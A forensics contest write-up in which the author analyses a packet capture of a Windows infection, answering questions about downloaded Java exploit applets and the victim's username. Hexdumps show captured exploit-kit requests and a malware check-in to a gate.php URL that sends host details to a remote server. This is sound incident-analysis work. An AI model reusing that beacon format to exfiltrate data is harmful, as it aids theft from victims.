Name: Christian North 

Description: 
The first thing I did was validate the MD5 checksum of the
infected.pcap file.

hacktop:/home/cnorth/forensics/puzzle5/$ md5sum  infected.pcap
c09a3019ada7ab17a44537b069480312  infected.pcap

The checksum matches the hash published on http://forensicscontest.com.

Next I reviewed the pcap file with an IP traffic analyzer I'm developing 
in my spare time.  

hacktop:/home/cnorth/forensics/puzzle5/$ tracenet -A -f infected.pcap
tracenet> reading packets from infected.pcap
tracenet> detected pcap magic number
Read 303 packets in 0.02 seconds (188538 octets) from infected.pcap
Dropped   0 packets
Discarded 0 packets

Filtered 303 packets - 100.000% (27.2 kbit/s)

Protocol  Details          Packets               Data Transfer      Avg Rate
--------------------------------------------------------------------------------
TCP/80    www              257        84.818%    174 KB  94.570%     26 kbit/s 
TCP/443   https            19          6.271%      8 KB   4.084%      1 kbit/s 
UDP/53    domain           12          3.960%      1 KB   0.698%    190 bit/s  
TCP/444   snpp             9           2.970%    673 B    0.365%     99 bit/s  
UDP/137   netbios-ns       6           1.980%    522 B    0.283%     77 bit/s  

TCP: 94.059% UDP: 5.941% ICMP: 0.000% ICMP6: 0.000% ARP: 0.000% OTHER: 0.000%


We can now see the pcap file contains 303 packets distributed over 5 protocols.
In order to better understand the HTTP traffic details I needed to reassemble
the TCP streams .

hacktop:/home/cnorth/forensics/puzzle5/$ mkdir streams
hacktop:/home/cnorth/forensics/puzzle5/$ tracenet -f infected.pcap -r streams
hacktop:/home/cnorth/forensics/puzzle5/$ cd streams
hacktop:/home/cnorth/forensics/puzzle5/$ ls -l
-rw-r--r-- 1 cnorth   cnorth    2739 2010-04-02 19:07 C0A81781-1061-3B355B66-80
-rw-r--r-- 1 cnorth   cnorth    6705 2010-04-02 19:07 C0A81781-1062-4137C3FA-443
-rw-r--r-- 1 cnorth   cnorth     832 2010-04-02 19:07 C0A81781-1063-3B355B66-80
-rw-r--r-- 1 cnorth   cnorth    7599 2010-04-02 19:07 C0A81781-1064-3B355B66-80
-rw-r--r-- 1 cnorth   cnorth    6090 2010-04-02 19:07 C0A81781-1065-3B355B66-80
-rw-r--r-- 1 cnorth   cnorth   68581 2010-04-02 19:07 C0A81781-1066-3B355B66-80
-rw-r--r-- 1 cnorth   cnorth   68569 2010-04-02 19:07 C0A81781-1067-3B355B66-80
-rw-r--r-- 1 cnorth   cnorth     263 2010-04-02 19:07 C0A81781-1068-D59B1D90-444
-rw-r--r-- 1 cnorth   cnorth    1137 2010-04-02 19:07 C0A81781-1069-D4FC2014-80

This is the naming convention used for the reassembled TCP stream files:

HEX_SRC_IP-SRC_PORT-HEX_DST_IP-DST_PORT.

The output shows that 9 TCP streams were reassembled.
	7 - TCP/80  HTTP 
	1 - TCP/443 HTTPS
	1 - TCP/444 ?

Using grep and hexdump allowed me to find the answer to question #1. 

Grep was used to determine which stream files contained the string "jar"
and hexdump was used to confirm these were HTTP GET requests.

hacktop:/home/cnorth/forensics/puzzle5/streams# grep jar *-80
Binary file C0A81781-1064-3B355B66-80 matches
Binary file C0A81781-1065-3B355B66-80 matches

$ hexdump -C C0A81781-1064-3B355B66-80 -n25
00000000  47 45 54 20 2f 73 64 66  67 2e 6a 61 72 20 48 54  |GET /sdfg.jar HT|
00000010  54 50 2f 31 2e 31 0d 0a  61                       |TP/1.1..a|
00000019

$ hexdump -C C0A81781-1065-3B355B66-80 -n25
00000000  47 45 54 20 2f 71 2e 6a  61 72 20 48 54 54 50 2f  |GET /q.jar HTTP/|
00000010  31 2e 31 0d 0a 61 63 63  65                       |1.1..acce|
00000019


===============================================================================

Q1.  As part of the infection process, Ms. Moneymany’s browser downloaded two 
     Java applets. What were the names of the two .jar files that implemented 
     these applets?

A1.  sdfg.jar 
     q.jar

===============================================================================


Using a bash for loop with hexdump to inspect the HTTP traffic appears
to provide the answer to question #2 in the last stream file

$ for i in `ls *-80`; do echo $i;hexdump -C -n100 $i; done
C0A81781-1061-3B355B66-80
00000000  47 45 54 20 2f 74 72 75  65 2e 70 68 70 20 48 54  |GET /true.php HT|
00000010  54 50 2f 31 2e 31 0d 0a  41 63 63 65 70 74 3a 20  |TP/1.1..Accept: |
00000020  69 6d 61 67 65 2f 67 69  66 2c 20 69 6d 61 67 65  |image/gif, image|
00000030  2f 6a 70 65 67 2c 20 69  6d 61 67 65 2f 70 6a 70  |/jpeg, image/pjp|
00000040  65 67 2c 20 69 6d 61 67  65 2f 70 6a 70 65 67 2c  |eg, image/pjpeg,|
00000050  20 61 70 70 6c 69 63 61  74 69 6f 6e 2f 78 2d 73  | application/x-s|
00000060  68 6f 63 6b                                       |hock|
00000064
C0A81781-1063-3B355B66-80
00000000  47 45 54 20 2f 66 61 76  69 63 6f 6e 2e 69 63 6f  |GET /favicon.ico|
00000010  20 48 54 54 50 2f 31 2e  31 0d 0a 41 63 63 65 70  | HTTP/1.1..Accep|
00000020  74 3a 20 2a 2f 2a 0d 0a  41 63 63 65 70 74 2d 45  |t: */*..Accept-E|
00000030  6e 63 6f 64 69 6e 67 3a  20 67 7a 69 70 2c 20 64  |ncoding: gzip, d|
00000040  65 66 6c 61 74 65 0d 0a  55 73 65 72 2d 41 67 65  |eflate..User-Age|
00000050  6e 74 3a 20 4d 6f 7a 69  6c 6c 61 2f 34 2e 30 20  |nt: Mozilla/4.0 |
00000060  28 63 6f 6d                                       |(com|
00000064
C0A81781-1064-3B355B66-80
00000000  47 45 54 20 2f 73 64 66  67 2e 6a 61 72 20 48 54  |GET /sdfg.jar HT|
00000010  54 50 2f 31 2e 31 0d 0a  61 63 63 65 70 74 2d 65  |TP/1.1..accept-e|
00000020  6e 63 6f 64 69 6e 67 3a  20 70 61 63 6b 32 30 30  |ncoding: pack200|
00000030  2d 67 7a 69 70 2c 20 67  7a 69 70 0d 0a 63 6f 6e  |-gzip, gzip..con|
00000040  74 65 6e 74 2d 74 79 70  65 3a 20 61 70 70 6c 69  |tent-type: appli|
00000050  63 61 74 69 6f 6e 2f 78  2d 6a 61 76 61 2d 61 72  |cation/x-java-ar|
00000060  63 68 69 76                                       |chiv|
00000064
C0A81781-1065-3B355B66-80
00000000  47 45 54 20 2f 71 2e 6a  61 72 20 48 54 54 50 2f  |GET /q.jar HTTP/|
00000010  31 2e 31 0d 0a 61 63 63  65 70 74 2d 65 6e 63 6f  |1.1..accept-enco|
00000020  64 69 6e 67 3a 20 70 61  63 6b 32 30 30 2d 67 7a  |ding: pack200-gz|
00000030  69 70 2c 20 67 7a 69 70  0d 0a 63 6f 6e 74 65 6e  |ip, gzip..conten|
00000040  74 2d 74 79 70 65 3a 20  61 70 70 6c 69 63 61 74  |t-type: applicat|
00000050  69 6f 6e 2f 78 2d 6a 61  76 61 2d 61 72 63 68 69  |ion/x-java-archi|
00000060  76 65 0d 0a                                       |ve..|
00000064
C0A81781-1066-3B355B66-80
00000000  47 45 54 20 2f 2f 6c 6f  61 64 69 6e 67 2e 70 68  |GET //loading.ph|
00000010  70 3f 73 70 6c 3d 6a 61  76 61 64 6e 77 26 4a 30  |p?spl=javadnw&J0|
00000020  35 30 30 30 36 30 31 30  20 48 54 54 50 2f 31 2e  |50006010 HTTP/1.|
00000030  31 0d 0a 55 73 65 72 2d  41 67 65 6e 74 3a 20 4d  |1..User-Agent: M|
00000040  6f 7a 69 6c 6c 61 2f 34  2e 30 20 28 57 69 6e 64  |ozilla/4.0 (Wind|
00000050  6f 77 73 20 58 50 20 35  2e 31 29 20 4a 61 76 61  |ows XP 5.1) Java|
00000060  2f 31 2e 36                                       |/1.6|
00000064
C0A81781-1067-3B355B66-80
00000000  47 45 54 20 2f 2f 6c 6f  61 64 69 6e 67 2e 70 68  |GET //loading.ph|
00000010  70 3f 73 70 6c 3d 6a 61  76 61 64 30 20 48 54 54  |p?spl=javad0 HTT|
00000020  50 2f 31 2e 31 0d 0a 55  73 65 72 2d 41 67 65 6e  |P/1.1..User-Agen|
00000030  74 3a 20 4d 6f 7a 69 6c  6c 61 2f 34 2e 30 20 28  |t: Mozilla/4.0 (|
00000040  57 69 6e 64 6f 77 73 20  58 50 20 35 2e 31 29 20  |Windows XP 5.1) |
00000050  4a 61 76 61 2f 31 2e 36  2e 30 5f 30 35 0d 0a 48  |Java/1.6.0_05..H|
00000060  6f 73 74 3a                                       |ost:|
00000064
C0A81781-1069-D4FC2014-80
00000000  47 45 54 20 2f 31 31 31  31 31 2f 67 61 74 65 2e  |GET /11111/gate.|
00000010  70 68 70 3f 67 75 69 64  3d 41 44 4d 49 4e 49 53  |php?guid=ADMINIS|
00000020  54 52 41 54 4f 52 21 54  49 43 4b 4c 41 42 53 2d  |TRATOR!TICKLABS-|
00000030  4c 5a 21 31 43 37 41 45  37 43 31 26 76 65 72 3d  |LZ!1C7AE7C1&ver=|
00000040  31 30 30 38 34 26 73 74  61 74 3d 4f 4e 4c 49 4e  |10084&stat=ONLIN|
00000050  45 26 69 65 3d 38 2e 30  2e 36 30 30 31 2e 31 38  |E&ie=8.0.6001.18|
00000060  37 30 32 26                                       |702&|
00000064

I closer look at the connection to 212.252.32.20 (D4FC2014) showed an 
interesting HTTP GET request that appears to leak a username.  Even though 
the server responds with a 404 not found, the server operator would now have 
the client's content request details in their web logs... Yikes.

$ tracenet -nx 212.252.32.20 -f infected.pcap 
tracenet> filtering ip 212.252.32.20
tracenet> reading packets from infected.pcap
detected pcap magic number

03-16 11:51:05.114322 00:0C:29:CA:2A:F2 -> 00:50:56:F5:48:D4 0x0800 (IP) 48
IP TOS 0x00 ID 414   DF TTL 128 192.168.23.129:1069 -> 212.252.32.20:80 
TCP [....S.] SEQ 3322940847 ACK 0          WIN 64240 DATA 0

03-16 11:51:05.392912 00:50:56:F5:48:D4 -> 00:0C:29:CA:2A:F2 0x0800 (IP) 46
IP TOS 0x00 ID 220      TTL 128 212.252.32.20:80 -> 192.168.23.129:1069 
TCP [.A..S.] SEQ 1499272799 ACK 3322940848 WIN 64240 DATA 0

03-16 11:51:05.392944 00:0C:29:CA:2A:F2 -> 00:50:56:F5:48:D4 0x0800 (IP) 46
IP TOS 0x00 ID 415   DF TTL 128 192.168.23.129:1069 -> 212.252.32.20:80 
TCP [.A....] SEQ 3322940848 ACK 1499272800 WIN 64240 DATA 0

03-16 11:51:05.397195 00:0C:29:CA:2A:F2 -> 00:50:56:F5:48:D4 0x0800 (IP) 291
IP TOS 0x00 ID 416   DF TTL 128 192.168.23.129:1069 -> 212.252.32.20:80 
TCP [.AP...] SEQ 3322940848 ACK 1499272800 WIN 64240 DATA 251
0x0000  47 45 54 20  2F 31 31 31  31 31 2F 67  61 74 65 2E | GET /11111/gate.
0x0010  70 68 70 3F  67 75 69 64  3D 41 44 4D  49 4E 49 53 | php?guid=ADMINIS
0x0020  54 52 41 54  4F 52 21 54  49 43 4B 4C  41 42 53 2D | TRATOR!TICKLABS-
0x0030  4C 5A 21 31  43 37 41 45  37 43 31 26  76 65 72 3D | LZ!1C7AE7C1&ver=
0x0040  31 30 30 38  34 26 73 74  61 74 3D 4F  4E 4C 49 4E | 10084&stat=ONLIN
0x0050  45 26 69 65  3D 38 2E 30  2E 36 30 30  31 2E 31 38 | E&ie=8.0.6001.18
0x0060  37 30 32 26  6F 73 3D 35  2E 31 2E 32  36 30 30 26 | 702&os=5.1.2600&
0x0070  75 74 3D 41  64 6D 69 6E  26 63 70 75  3D 39 32 26 | ut=Admin&cpu=92&
0x0080  63 63 72 63  3D 35 41 34  46 34 44 46  37 26 6D 64 | ccrc=5A4F4DF7&md
0x0090  35 3D 35 39  34 32 62 61  33 36 63 66  37 33 32 30 | 5=5942ba36cf7320
0x00A0  39 37 34 37  39 63 35 31  39 38 36 65  65 65 39 31 | 97479c51986eee91
0x00B0  65 64 20 48  54 54 50 2F  31 2E 31 0D  0A 55 73 65 | ed HTTP/1.1..Use
0x00C0  72 2D 41 67  65 6E 74 3A  20 4D 69 63  72 6F 73 6F | r-Agent: Microso
0x00D0  66 74 20 49  6E 74 65 72  6E 65 74 20  45 78 70 6C | ft Internet Expl
0x00E0  6F 72 65 72  0D 0A 48 6F  73 74 3A 20  66 72 65 65 | orer..Host: free
0x00F0  77 61 79 73  2E 69 6E 0D  0A 0D 0A                 | ways.in....

03-16 11:51:05.397212 00:50:56:F5:48:D4 -> 00:0C:29:CA:2A:F2 0x0800 (IP) 46
IP TOS 0x00 ID 221      TTL 128 212.252.32.20:80 -> 192.168.23.129:1069 
TCP [.A....] SEQ 1499272800 ACK 3322941099 WIN 64240 DATA 0

03-16 11:51:05.645636 00:50:56:F5:48:D4 -> 00:0C:29:CA:2A:F2 0x0800 (IP) 926
IP TOS 0x00 ID 222      TTL 128 212.252.32.20:80 -> 192.168.23.129:1069 
TCP [.AP...] SEQ 1499272800 ACK 3322941099 WIN 64240 DATA 886
0x0000  48 54 54 50  2F 31 2E 31  20 34 30 34  20 4E 6F 74 | HTTP/1.1 404 Not
0x0010  20 46 6F 75  6E 64 0D 0A  44 61 74 65  3A 20 54 75 |  Found..Date: Tu
0x0020  65 2C 20 31  36 20 4D 61  72 20 32 30  31 30 20 31 | e, 16 Mar 2010 1
0x0030  36 3A 35 31  3A 30 39 20  47 4D 54 0D  0A 53 65 72 | 6:51:09 GMT..Ser
0x0040  76 65 72 3A  20 41 70 61  63 68 65 2F  32 0D 0A 41 | ver: Apache/2..A
0x0050  63 63 65 70  74 2D 52 61  6E 67 65 73  3A 20 62 79 | ccept-Ranges: by
0x0060  74 65 73 0D  0A 56 61 72  79 3A 20 41  63 63 65 70 | tes..Vary: Accep
0x0070  74 2D 45 6E  63 6F 64 69  6E 67 2C 55  73 65 72 2D | t-Encoding,User-
0x0080  41 67 65 6E  74 0D 0A 54  72 61 6E 73  66 65 72 2D | Agent..Transfer-
0x0090  45 6E 63 6F  64 69 6E 67  3A 20 63 68  75 6E 6B 65 | Encoding: chunke
0x00A0  64 0D 0A 43  6F 6E 74 65  6E 74 2D 54  79 70 65 3A | d..Content-Type:
0x00B0  20 74 65 78  74 2F 68 74  6D 6C 0D 0A  0D 0A 39 30 |  text/html....90
0x00C0  0D 0A 3C 21  44 4F 43 54  59 50 45 20  48 54 4D 4C | ..<!DOCTYPE HTML
0x00D0  20 50 55 42  4C 49 43 20  22 2D 2F 2F  49 45 54 46 |  PUBLIC "-//IETF
0x00E0  2F 2F 44 54  44 20 48 54  4D 4C 20 32  2E 30 2F 2F | //DTD HTML 2.0//
0x00F0  45 4E 22 3E  0A 3C 48 54  4D 4C 3E 3C  48 45 41 44 | EN">.<HTML><HEAD
0x0100  3E 0A 3C 54  49 54 4C 45  3E 34 30 34  20 4E 6F 74 | >.<TITLE>404 Not
0x0110  20 46 6F 75  6E 64 3C 2F  54 49 54 4C  45 3E 0A 3C |  Found</TITLE>.<
0x0120  2F 48 45 41  44 3E 3C 42  4F 44 59 3E  0A 3C 48 31 | /HEAD><BODY>.<H1
0x0130  3E 4E 6F 74  20 46 6F 75  6E 64 3C 2F  48 31 3E 0A | >Not Found</H1>.
0x0140  54 68 65 20  72 65 71 75  65 73 74 65  64 20 55 52 | The requested UR
0x0150  4C 20 0D 0A  66 35 0D 0A  2F 31 31 31  31 31 2F 67 | L ..f5../11111/g
0x0160  61 74 65 2E  70 68 70 3F  67 75 69 64  3D 41 44 4D | ate.php?guid=ADM
0x0170  49 4E 49 53  54 52 41 54  4F 52 21 54  49 43 4B 4C | INISTRATOR!TICKL
0x0180  41 42 53 2D  4C 5A 21 31  43 37 41 45  37 43 31 26 | ABS-LZ!1C7AE7C1&
0x0190  61 6D 70 3B  76 65 72 3D  31 30 30 38  34 26 61 6D | amp;ver=10084&am
0x01A0  70 3B 73 74  61 74 3D 4F  4E 4C 49 4E  45 26 61 6D | p;stat=ONLINE&am
0x01B0  70 3B 69 65  3D 38 2E 30  2E 36 30 30  31 2E 31 38 | p;ie=8.0.6001.18
0x01C0  37 30 32 26  61 6D 70 3B  6F 73 3D 35  2E 31 2E 32 | 702&amp;os=5.1.2
0x01D0  36 30 30 26  61 6D 70 3B  75 74 3D 41  64 6D 69 6E | 600&amp;ut=Admin
0x01E0  26 61 6D 70  3B 63 70 75  3D 39 32 26  61 6D 70 3B | &amp;cpu=92&amp;
0x01F0  63 63 72 63  3D 35 41 34  46 34 44 46  37 26 61 6D | ccrc=5A4F4DF7&am
0x0200  70 3B 6D 64  35 3D 35 39  34 32 62 61  33 36 63 66 | p;md5=5942ba36cf
0x0210  37 33 32 30  39 37 34 37  39 63 35 31  39 38 36 65 | 732097479c51986e
0x0220  65 65 39 31  65 64 20 77  61 73 20 6E  6F 74 20 66 | ee91ed was not f
0x0230  6F 75 6E 64  20 6F 6E 20  74 68 69 73  20 73 65 72 | ound on this ser
0x0240  76 65 72 2E  0A 3C 48 52  3E 0A 3C 49  3E 0D 0A 31 | ver..<HR>.<I>..1
0x0250  31 62 0D 0A  66 72 65 65  77 61 79 73  2E 69 6E 3C | 1b..freeways.in<
0x0260  2F 49 3E 0A  3C 2F 42 4F  44 59 3E 3C  2F 48 54 4D | /I>.</BODY></HTM
0x0270  4C 3E 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | L>..............
0x0280  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0290  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x02A0  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x02B0  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x02C0  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x02D0  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x02E0  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x02F0  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0300  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0310  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0320  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0330  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0340  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0350  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0360  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0D | ................
0x0370  0A 30 0D 0A  0D 0A                                 | .0....

03-16 11:51:05.745725 00:50:56:F5:48:D4 -> 00:0C:29:CA:2A:F2 0x0800 (IP) 926
IP TOS 0x00 ID 223      TTL 128 212.252.32.20:80 -> 192.168.23.129:1069 
TCP [.AP...] SEQ 1499272800 ACK 3322941099 WIN 64240 DATA 886
0x0000  48 54 54 50  2F 31 2E 31  20 34 30 34  20 4E 6F 74 | HTTP/1.1 404 Not
0x0010  20 46 6F 75  6E 64 0D 0A  44 61 74 65  3A 20 54 75 |  Found..Date: Tu
0x0020  65 2C 20 31  36 20 4D 61  72 20 32 30  31 30 20 31 | e, 16 Mar 2010 1
0x0030  36 3A 35 31  3A 30 39 20  47 4D 54 0D  0A 53 65 72 | 6:51:09 GMT..Ser
0x0040  76 65 72 3A  20 41 70 61  63 68 65 2F  32 0D 0A 41 | ver: Apache/2..A
0x0050  63 63 65 70  74 2D 52 61  6E 67 65 73  3A 20 62 79 | ccept-Ranges: by
0x0060  74 65 73 0D  0A 56 61 72  79 3A 20 41  63 63 65 70 | tes..Vary: Accep
0x0070  74 2D 45 6E  63 6F 64 69  6E 67 2C 55  73 65 72 2D | t-Encoding,User-
0x0080  41 67 65 6E  74 0D 0A 54  72 61 6E 73  66 65 72 2D | Agent..Transfer-
0x0090  45 6E 63 6F  64 69 6E 67  3A 20 63 68  75 6E 6B 65 | Encoding: chunke
0x00A0  64 0D 0A 43  6F 6E 74 65  6E 74 2D 54  79 70 65 3A | d..Content-Type:
0x00B0  20 74 65 78  74 2F 68 74  6D 6C 0D 0A  0D 0A 39 30 |  text/html....90
0x00C0  0D 0A 3C 21  44 4F 43 54  59 50 45 20  48 54 4D 4C | ..<!DOCTYPE HTML
0x00D0  20 50 55 42  4C 49 43 20  22 2D 2F 2F  49 45 54 46 |  PUBLIC "-//IETF
0x00E0  2F 2F 44 54  44 20 48 54  4D 4C 20 32  2E 30 2F 2F | //DTD HTML 2.0//
0x00F0  45 4E 22 3E  0A 3C 48 54  4D 4C 3E 3C  48 45 41 44 | EN">.<HTML><HEAD
0x0100  3E 0A 3C 54  49 54 4C 45  3E 34 30 34  20 4E 6F 74 | >.<TITLE>404 Not
0x0110  20 46 6F 75  6E 64 3C 2F  54 49 54 4C  45 3E 0A 3C |  Found</TITLE>.<
0x0120  2F 48 45 41  44 3E 3C 42  4F 44 59 3E  0A 3C 48 31 | /HEAD><BODY>.<H1
0x0130  3E 4E 6F 74  20 46 6F 75  6E 64 3C 2F  48 31 3E 0A | >Not Found</H1>.
0x0140  54 68 65 20  72 65 71 75  65 73 74 65  64 20 55 52 | The requested UR
0x0150  4C 20 0D 0A  66 35 0D 0A  2F 31 31 31  31 31 2F 67 | L ..f5../11111/g
0x0160  61 74 65 2E  70 68 70 3F  67 75 69 64  3D 41 44 4D | ate.php?guid=ADM
0x0170  49 4E 49 53  54 52 41 54  4F 52 21 54  49 43 4B 4C | INISTRATOR!TICKL
0x0180  41 42 53 2D  4C 5A 21 31  43 37 41 45  37 43 31 26 | ABS-LZ!1C7AE7C1&
0x0190  61 6D 70 3B  76 65 72 3D  31 30 30 38  34 26 61 6D | amp;ver=10084&am
0x01A0  70 3B 73 74  61 74 3D 4F  4E 4C 49 4E  45 26 61 6D | p;stat=ONLINE&am
0x01B0  70 3B 69 65  3D 38 2E 30  2E 36 30 30  31 2E 31 38 | p;ie=8.0.6001.18
0x01C0  37 30 32 26  61 6D 70 3B  6F 73 3D 35  2E 31 2E 32 | 702&amp;os=5.1.2
0x01D0  36 30 30 26  61 6D 70 3B  75 74 3D 41  64 6D 69 6E | 600&amp;ut=Admin
0x01E0  26 61 6D 70  3B 63 70 75  3D 39 32 26  61 6D 70 3B | &amp;cpu=92&amp;
0x01F0  63 63 72 63  3D 35 41 34  46 34 44 46  37 26 61 6D | ccrc=5A4F4DF7&am
0x0200  70 3B 6D 64  35 3D 35 39  34 32 62 61  33 36 63 66 | p;md5=5942ba36cf
0x0210  37 33 32 30  39 37 34 37  39 63 35 31  39 38 36 65 | 732097479c51986e
0x0220  65 65 39 31  65 64 20 77  61 73 20 6E  6F 74 20 66 | ee91ed was not f
0x0230  6F 75 6E 64  20 6F 6E 20  74 68 69 73  20 73 65 72 | ound on this ser
0x0240  76 65 72 2E  0A 3C 48 52  3E 0A 3C 49  3E 0D 0A 31 | ver..<HR>.<I>..1
0x0250  31 62 0D 0A  66 72 65 65  77 61 79 73  2E 69 6E 3C | 1b..freeways.in<
0x0260  2F 49 3E 0A  3C 2F 42 4F  44 59 3E 3C  2F 48 54 4D | /I>.</BODY></HTM
0x0270  4C 3E 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | L>..............
0x0280  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0290  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x02A0  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x02B0  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x02C0  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x02D0  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x02E0  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x02F0  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0300  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0310  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0320  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0330  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0340  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0350  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A | ................
0x0360  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0A  0A 0A 0A 0D | ................
0x0370  0A 30 0D 0A  0D 0A                                 | .0....

03-16 11:51:05.745747 00:0C:29:CA:2A:F2 -> 00:50:56:F5:48:D4 0x0800 (IP) 46
IP TOS 0x00 ID 417   DF TTL 128 192.168.23.129:1069 -> 212.252.32.20:80 
TCP [.A....] SEQ 3322941099 ACK 1499273686 WIN 63354 DATA 0

03-16 11:51:06.059094 00:50:56:F5:48:D4 -> 00:0C:29:CA:2A:F2 0x0800 (IP) 46
IP TOS 0x00 ID 225      TTL 128 212.252.32.20:80 -> 192.168.23.129:1069 
TCP [.AP..F] SEQ 1499273686 ACK 3322941099 WIN 64240 DATA 0

03-16 11:51:06.631106 00:0C:29:CA:2A:F2 -> 00:50:56:F5:48:D4 0x0800 (IP) 46
IP TOS 0x00 ID 419   DF TTL 128 192.168.23.129:1069 -> 212.252.32.20:80 
TCP [.A....] SEQ 3322941099 ACK 1499273687 WIN 63354 DATA 0



===============================================================================

Q2.  What was Ms. Moneymany’s username on the infected Windows system?

A2.  ADMINISTRATOR

===============================================================================


To find the answer to question #3 I needed to review the web content that was
downloaded.  After reading RFC 2616 I learned to extract the content I needed
to identify the encoding type and content offset within each stream file.
The reassembled HTTP stream files contain both the client's request for 
content and the server's response with the content.

With that in mind I used hexdump against the first stream file to  identify 
the client's request for content, from which host, with what encoding type, 
and the content offset.

$ hexdump C0A81781-1061-3B355B66-80 -C -n 1000
00000000  47 45 54 20 2f 74 72 75  65 2e 70 68 70 20 48 54  |GET /true.php HT|
00000010  54 50 2f 31 2e 31 0d 0a  41 63 63 65 70 74 3a 20  |TP/1.1..Accept: |
00000020  69 6d 61 67 65 2f 67 69  66 2c 20 69 6d 61 67 65  |image/gif, image|
00000030  2f 6a 70 65 67 2c 20 69  6d 61 67 65 2f 70 6a 70  |/jpeg, image/pjp|
00000040  65 67 2c 20 69 6d 61 67  65 2f 70 6a 70 65 67 2c  |eg, image/pjpeg,|
00000050  20 61 70 70 6c 69 63 61  74 69 6f 6e 2f 78 2d 73  | application/x-s|
00000060  68 6f 63 6b 77 61 76 65  2d 66 6c 61 73 68 2c 20  |hockwave-flash, |
00000070  61 70 70 6c 69 63 61 74  69 6f 6e 2f 78 2d 6d 73  |application/x-ms|
00000080  2d 61 70 70 6c 69 63 61  74 69 6f 6e 2c 20 61 70  |-application, ap|
00000090  70 6c 69 63 61 74 69 6f  6e 2f 78 2d 6d 73 2d 78  |plication/x-ms-x|
000000a0  62 61 70 2c 20 61 70 70  6c 69 63 61 74 69 6f 6e  |bap, application|
000000b0  2f 76 6e 64 2e 6d 73 2d  78 70 73 64 6f 63 75 6d  |/vnd.ms-xpsdocum|
000000c0  65 6e 74 2c 20 61 70 70  6c 69 63 61 74 69 6f 6e  |ent, application|
000000d0  2f 78 61 6d 6c 2b 78 6d  6c 2c 20 2a 2f 2a 0d 0a  |/xaml+xml, */*..|
000000e0  41 63 63 65 70 74 2d 4c  61 6e 67 75 61 67 65 3a  |Accept-Language:|
000000f0  20 65 6e 2d 75 73 0d 0a  55 73 65 72 2d 41 67 65  | en-us..User-Age|
00000100  6e 74 3a 20 4d 6f 7a 69  6c 6c 61 2f 34 2e 30 20  |nt: Mozilla/4.0 |
00000110  28 63 6f 6d 70 61 74 69  62 6c 65 3b 20 4d 53 49  |(compatible; MSI|
00000120  45 20 38 2e 30 3b 20 57  69 6e 64 6f 77 73 20 4e  |E 8.0; Windows N|
00000130  54 20 35 2e 31 3b 20 54  72 69 64 65 6e 74 2f 34  |T 5.1; Trident/4|
00000140  2e 30 3b 20 2e 4e 45 54  20 43 4c 52 20 32 2e 30  |.0; .NET CLR 2.0|
00000150  2e 35 30 37 32 37 3b 20  2e 4e 45 54 20 43 4c 52  |.50727; .NET CLR|
00000160  20 33 2e 30 2e 34 35 30  36 2e 32 31 35 32 3b 20  | 3.0.4506.2152; |
00000170  2e 4e 45 54 20 43 4c 52  20 33 2e 35 2e 33 30 37  |.NET CLR 3.5.307|
00000180  32 39 29 0d 0a 41 63 63  65 70 74 2d 45 6e 63 6f  |29)..Accept-Enco|
00000190  64 69 6e 67 3a 20 67 7a  69 70 2c 20 64 65 66 6c  |ding: gzip, defl|
000001a0  61 74 65 0d 0a 48 6f 73  74 3a 20 6e 72 74 6a 6f  |ate..Host: nrtjo|
000001b0  2e 65 75 0d 0a 43 6f 6e  6e 65 63 74 69 6f 6e 3a  |.eu..Connection:|
000001c0  20 4b 65 65 70 2d 41 6c  69 76 65 0d 0a 0d 0a 48  | Keep-Alive....H|
